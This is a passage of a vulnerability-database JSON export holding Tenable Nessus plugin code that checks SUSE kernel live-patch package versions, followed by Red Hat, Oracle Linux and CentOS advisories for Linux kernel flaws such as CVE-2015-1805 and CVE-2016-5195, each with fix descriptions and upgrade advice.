script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_96-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_96-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_99-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_99-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_107-default-4-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_107-xen-4-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_96-default-7-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_96-xen-7-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_99-default-6-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_99-xen-6-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-28T10:59:14", "description": "This update for the Linux Kernel 3.12.61-52_141 fixes one issue.\n\nThe following security issue was fixed :\n\nCVE-2018-9568: Prevent 
possible memory corruption due to type\nconfusion in sk_clone_lock. This could lead to local privilege\nescalation (bsc#1118319).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 12, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-12-20T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:4196-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-9568"], "modified": "2018-12-20T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_136-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_146-xen", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_136-xen", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_141-xen", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_146-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_141-default"], "id": "SUSE_SU-2018-4196-1.NASL", "href": "https://www.tenable.com/plugins/nessus/119810", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:4196-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119810);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/27\");\n\n script_cve_id(\"CVE-2018-9568\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:4196-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", 
\n value:\n\"This update for the Linux Kernel 3.12.61-52_141 fixes one issue.\n\nThe following security issue was fixed :\n\nCVE-2018-9568: Prevent possible memory corruption due to type\nconfusion in sk_clone_lock. This could lead to local privilege\nescalation (bsc#1118319).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1118320\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-9568/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20184196-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7a7068fc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2018-2993=1 SUSE-SLE-SERVER-12-2018-2994=1\nSUSE-SLE-SERVER-12-2018-3000=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_136-default\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_136-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_141-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_141-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_146-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_146-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_136-default-7-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_136-xen-7-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_141-default-6-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_141-xen-6-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_146-default-4-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_146-xen-4-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:47:11", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1805"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating 
system.\n\n* It was found that the Linux kernel's implementation of vectored pipe read\nand write functionality did not take into account the I/O vectors that were\nalready processed when retrying after a failed atomic access operation,\npotentially resulting in memory corruption due to an I/O vector array\noverrun. A local, unprivileged user could use this flaw to crash the system\nor, potentially, escalate their privileges on the system. (CVE-2015-1805,\nImportant)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update also fixes the following bugs:\n\n* The backlog data could previously not be consumed when the\naudit_log_start() function was running even if audit_log_start() called the\nwait_for_auditd() function to consume it. As only auditd could consume the\nbacklog data, audit_log_start() terminated unexpectedly. Consequently, the\nsystem became unresponsive until the backlog timeout was up. With this\nupdate, audit_log_start() no longer terminates and the system shuts down\nand reboots gracefully in a timely manner. (BZ#1140489)\n\n* Direct I/O writes extending a parallel file could previously race to\nupdate the size of the file. If the writes executed in the out-of-order\nmanner, the file size could move backwards and push a previously completed\nwrite beyond EOF, causing it to be lost. With this update, file size\nupdates are always executed in appropriate order, thus fixing this bug.\n(BZ#1218497)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
The system must be\nrebooted for this update to take effect.\n", "modified": "2015-07-07T22:13:10", "published": "2015-07-07T04:00:00", "id": "RHSA-2015:1211", "href": "https://access.redhat.com/errata/RHSA-2015:1211", "type": "redhat", "title": "(RHSA-2015:1211) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:26", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1805"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe read\nand write functionality did not take into account the I/O vectors that were\nalready processed when retrying after a failed atomic access operation,\npotentially resulting in memory corruption due to an I/O vector array\noverrun. A local, unprivileged user could use this flaw to crash the system\nor, potentially, escalate their privileges on the system. (CVE-2015-1805,\nImportant)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update also fixes the following bug:\n\n* Previously, the signal delivery paths did not clear the TS_USEDFPU flag,\nwhich could cause problems in the switch_to() function and lead to\nfloating-point unit (FPU) corruption. With this update, TS_USEDFPU is\ncleared as expected, and FPU is no longer under threat of corruption.\n(BZ#1214237)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
The system must be\nrebooted for this update to take effect.\n", "modified": "2017-09-08T12:16:24", "published": "2015-06-25T04:00:00", "id": "RHSA-2015:1190", "href": "https://access.redhat.com/errata/RHSA-2015:1190", "type": "redhat", "title": "(RHSA-2015:1190) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:33", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1805"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe read\nand write functionality did not take into account the I/O vectors that were\nalready processed when retrying after a failed atomic access operation,\npotentially resulting in memory corruption due to an I/O vector array\noverrun. A local, unprivileged user could use this flaw to crash the system\nor, potentially, escalate their privileges on the system. (CVE-2015-1805,\nImportant)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update also fixes the following bug:\n\n* Previously, the signal delivery paths did not clear the TS_USEDFPU flag,\nwhich could confuse the switch_to() function and lead to floating-point\nunit (FPU) corruption. With this update, TS_USEDFPU is cleared as expected,\nand FPU is no longer under threat of corruption. (BZ#1214239)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
The system must be\nrebooted for this update to take effect.\n", "modified": "2017-09-08T12:07:15", "published": "2015-06-16T04:00:00", "id": "RHSA-2015:1120", "href": "https://access.redhat.com/errata/RHSA-2015:1120", "type": "redhat", "title": "(RHSA-2015:1120) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:44", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1805"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe read\nand write functionality did not take into account the I/O vectors that were\nalready processed when retrying after a failed atomic access operation,\npotentially resulting in memory corruption due to an I/O vector array\noverrun. A local, unprivileged user could use this flaw to crash the system\nor, potentially, escalate their privileges on the system. (CVE-2015-1805,\nImportant)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update fixes the following bugs:\n\n* Due to a bug in the lpfc_device_reset_handler() function, a scsi command\ntimeout could lead to a system crash. With this update,\nlpfc_device_reset_handler recovers storage without crashing. (BZ#1070964)\n\n* Due to the code decrementing the reclaim_in_progress counter without\nhaving incremented it first, severe spinlock contention occurred in the\nshrink_zone() function even though the vm.max_reclaims_in_progress feature\nwas set to 1. This update provides a patch fixing the underlying source\ncode, and spinlock contention no longer occurs in this scenario.\n(BZ#1164105)\n\n* A TCP socket using SACK that had a retransmission but recovered from it,\nfailed to reset the retransmission timestamp. 
As a consequence, on certain\nconnections, if a packet had to be re-transmitted, the retrans_stamp\nvariable was only cleared when the next acked packet was received.\nThis could lead to an early abortion of the TCP connection if this next\npacket also got lost. With this update, the socket clears retrans_stamp\nwhen the recovery is completed, thus fixing the bug. (BZ#1205521)\n\n* Previously, the signal delivery paths did not clear the TS_USEDFPU flag,\nwhich could cause problems in the switch_to() function and lead to\nfloating-point unit (FPU) corruption. With this update, TS_USEDFPU is\ncleared as expected, and FPU is no longer under threat of corruption.\n(BZ#1193505)\n\n* A race condition in the exit_sem() function previously caused the\nsemaphore undo list corruption. As a consequence, a kernel crash could\noccur. The corruption in the semaphore undo list has been fixed, and the\nkernel no longer crashes in this situation. (BZ#1124574)\n\n* Previously, when running the \"virsh blockresize [Device] [Newsize]\"\ncommand to resize the disk, the new size was not reflected in a Red Hat\nEnterprise Linux 5 Virtual Machine (VM). With this update, the new size is\nnow reflected online immediately in a Red Hat Enterprise Linux 5 VM so it\nis no longer necessary to reboot the VM to see the new disk size.\n(BZ#1200855)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
The system must be\nrebooted for this update to take effect.\n", "modified": "2017-09-08T12:18:39", "published": "2015-06-02T04:00:00", "id": "RHSA-2015:1042", "href": "https://access.redhat.com/errata/RHSA-2015:1042", "type": "redhat", "title": "(RHSA-2015:1042) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.", "modified": "2016-10-27T12:44:17", "published": "2016-10-27T12:41:42", "id": "RHSA-2016:2120", "href": "https://access.redhat.com/errata/RHSA-2016:2120", "type": "redhat", "title": "(RHSA-2016:2120) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:14", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating\nsystem.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem\nhandled the copy-on-write (COW) breakage of private read-only memory mappings.\nAn unprivileged, local user could use this flaw to gain write access to\notherwise read-only memory mappings and thus increase their privileges on the\nsystem. 
(CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\n", "modified": "2017-09-08T11:56:15", "published": "2016-10-31T04:00:00", "id": "RHSA-2016:2126", "href": "https://access.redhat.com/errata/RHSA-2016:2126", "type": "redhat", "title": "(RHSA-2016:2126) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:35:52", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1805"], "description": "kernel\n[2.6.18-406]\n- [fs] pipe: fix pipe corruption and iovec overrun on partial copy (Mateusz Guzik) [1203787] {CVE-2015-1805}\n[2.6.18-405]\n- [net] tcp: zero retrans_stamp if all retrans were acked (Marcelo Leitner) [1205521]\n- [net] tcp: fix retrans_stamp advancing in error cases (Marcelo Leitner) [1205521]\n- [net] tcp: Fix inconsistency source (Marcelo Leitner) [1205521]\n- [ipc] sem: fix the potential use-after-free in freeary() (Oleg Nesterov) [1124574]\n- [scsi] lpfc: Fix crash in device reset handler (Rob Evers) [1070964]\n- [mm] fix broken max_reclaims_in_progress memory reclaim throttle (Lachlan McIlroy) [1164105]\n- [x86_64] fpu: save_i387() must clr TS_USEDFPU along with stts() (Oleg Nesterov) [1193505]\n- [block] virtio: Call revalidate_disk() upon online disk resize (Stefan Hajnoczi) [1200855]\n- [block] virtio: fix config handler race (Stefan Hajnoczi) [1200855]\n- [block] virtio: allow re-reading config space at runtime (Stefan Hajnoczi) [1200855]", "edition": 4, "modified": "2015-06-02T00:00:00", "published": "2015-06-02T00:00:00", "id": "ELSA-2015-1042", "href": "http://linux.oracle.com/errata/ELSA-2015-1042.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-30T19:16:47", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1805"], "description": "kernel\n[2.6.18-406.0.0.0.1]\n- [netfront] fix ring buffer index go back 
led vif stop [orabug 18272251]\n- [net] fix tcp_trim_head() (James Li) [orabug 14512145, 19219078]\n- ocfs2: dlm: fix recovery hung (Junxiao Bi) [orabug 13956772]\n- i386: fix MTRR code (Zhenzhong Duan) [orabug 15862649]\n- [oprofile] x86, mm: Add __get_user_pages_fast() [orabug 14277030]\n- [oprofile] export __get_user_pages_fast() function [orabug 14277030]\n- [oprofile] oprofile, x86: Fix nmi-unsafe callgraph support [orabug 14277030]\n- [oprofile] oprofile: use KM_NMI slot for kmap_atomic [orabug 14277030]\n- [oprofile] oprofile: i386 add get_user_pages_fast support [orabug 14277030]\n- [kernel] Initialize the local uninitialized variable stats. [orabug 14051367]\n- [fs] JBD:make jbd support 512B blocks correctly for ocfs2. [orabug 13477763]\n- [mm] fix hugetlb page leak (Dave McCracken) [orabug 12375075]\n- fix ia64 build error due to add-support-above-32-vcpus.patch(Zhenzhong Duan)\n- [x86] use dynamic vcpu_info remap to support more than 32 vcpus (Zhenzhong Duan)\n- [x86] Fix lvt0 reset when hvm boot up with noapic param\n- [scsi] remove printk's when doing I/O to a dead device (John Sobecki, Chris Mason)\n [orabug 12342275]\n- [char] ipmi: Fix IPMI errors due to timing problems (Joe Jin) [orabug 12561346]\n- [scsi] Fix race when removing SCSI devices (Joe Jin) [orabug 12404566]\n- [net] net: Redo the broken redhat netconsole over bonding (Tina Yang) [orabug 12740042]\n- [fs] nfs: Fix __put_nfs_open_context() NULL pointer panic (Joe Jin) [orabug 12687646]\n- fix filp_close() race (Joe Jin) [orabug 10335998]\n- make xenkbd.abs_pointer=1 by default [orabug 67188919]\n- [xen] check to see if hypervisor supports memory reservation change\n (Chuck Anderson) [orabug 7556514]\n- [net] Enable entropy for bnx2,bnx2x,e1000e,igb,ixgb,ixgbe,ixgbevf (John Sobecki)\n [orabug 10315433]\n- [NET] Add xen pv netconsole support (Tina Yang) [orabug 6993043] [bz 7258]\n- [mm] Patch shrink_zone to yield during severe mempressure events, avoiding\n hangs and evictions (John 
Sobecki,Chris Mason) [orabug 6086839]\n- [mm] Enhance shrink_zone patch allow full swap utilization, and also be\n NUMA-aware (John Sobecki,Chris Mason,Herbert van den Bergh) [orabug 9245919]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [xen] PVHVM guest with PoD crashes under memory pressure (Chuck Anderson)\n [orabug 9107465]\n- [xen] PV guest with FC HBA hangs during shutdown (Chuck Anderson)\n [orabug 9764220]\n- Support 256GB+ memory for pv guest (Mukesh Rathor) [orabug 9450615]\n- fix overcommit memory to use percpu_counter for (KOSAKI Motohiro,\n Guru Anbalagane) [orabug 6124033]\n- [ipmi] make configurable timeouts for kcs of ipmi [orabug 9752208]\n- [ib] fix memory corruption (Andy Grover) [orabug 9972346]\n- [usb] USB: fix __must_check warnings in drivers/usb/core/ (Junxiao Bi) [orabug 14795203]", "edition": 6, "modified": "2015-06-03T00:00:00", "published": "2015-06-03T00:00:00", "id": "ELSA-2015-1042-1", "href": "http://linux.oracle.com/errata/ELSA-2015-1042-1.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:18", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "kernel-uek\n[4.1.12-61.1.16]\n- mm: remove gup_flags FOLL_WRITE games from __get_user_pages() (Linus Torvalds) [Orabug: 24927306] {CVE-2016-5195}\n[4.1.12-61.1.15]\n- drivers/nvme: provide a module parameter for setting number of I/O queues (Shan Hai) [Orabug: 24914956] \n- blk-mq: improve warning for running a queue on the wrong CPU (Jens Axboe) [Orabug: 24914956] \n- blk-mq: fix freeze queue race (Shan Hai) [Orabug: 24914956]", "edition": 4, "modified": "2016-10-21T00:00:00", "published": "2016-10-21T00:00:00", "id": "ELSA-2016-3632", "href": "http://linux.oracle.com/errata/ELSA-2016-3632.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": 
"AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:26:15", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1805"], "description": "**CentOS Errata and Security Advisory** CESA-2015:1042\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's implementation of vectored pipe read\nand write functionality did not take into account the I/O vectors that were\nalready processed when retrying after a failed atomic access operation,\npotentially resulting in memory corruption due to an I/O vector array\noverrun. A local, unprivileged user could use this flaw to crash the system\nor, potentially, escalate their privileges on the system. (CVE-2015-1805,\nImportant)\n\nThe security impact of this issue was discovered by Red Hat.\n\nThis update fixes the following bugs:\n\n* Due to a bug in the lpfc_device_reset_handler() function, a scsi command\ntimeout could lead to a system crash. With this update,\nlpfc_device_reset_handler recovers storage without crashing. (BZ#1070964)\n\n* Due to the code decrementing the reclaim_in_progress counter without\nhaving incremented it first, severe spinlock contention occurred in the\nshrink_zone() function even though the vm.max_reclaims_in_progress feature\nwas set to 1. This update provides a patch fixing the underlying source\ncode, and spinlock contention no longer occurs in this scenario.\n(BZ#1164105)\n\n* A TCP socket using SACK that had a retransmission but recovered from it,\nfailed to reset the retransmission timestamp. As a consequence, on certain\nconnections, if a packet had to be re-transmitted, the retrans_stamp\nvariable was only cleared when the next acked packet was received.\nThis could lead to an early abortion of the TCP connection if this next\npacket also got lost. With this update, the socket clears retrans_stamp\nwhen the recovery is completed, thus fixing the bug. 
(BZ#1205521)\n\n* Previously, the signal delivery paths did not clear the TS_USEDFPU flag,\nwhich could cause problems in the switch_to() function and lead to\nfloating-point unit (FPU) corruption. With this update, TS_USEDFPU is\ncleared as expected, and FPU is no longer under threat of corruption.\n(BZ#1193505)\n\n* A race condition in the exit_sem() function previously caused the\nsemaphore undo list corruption. As a consequence, a kernel crash could\noccur. The corruption in the semaphore undo list has been fixed, and the\nkernel no longer crashes in this situation. (BZ#1124574)\n\n* Previously, when running the \"virsh blockresize [Device] [Newsize]\"\ncommand to resize the disk, the new size was not reflected in a Red Hat\nEnterprise Linux 5 Virtual Machine (VM). With this update, the new size is\nnow reflected online immediately in a Red Hat Enterprise Linux 5 VM so it\nis no longer necessary to reboot the VM to see the new disk size.\n(BZ#1200855)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
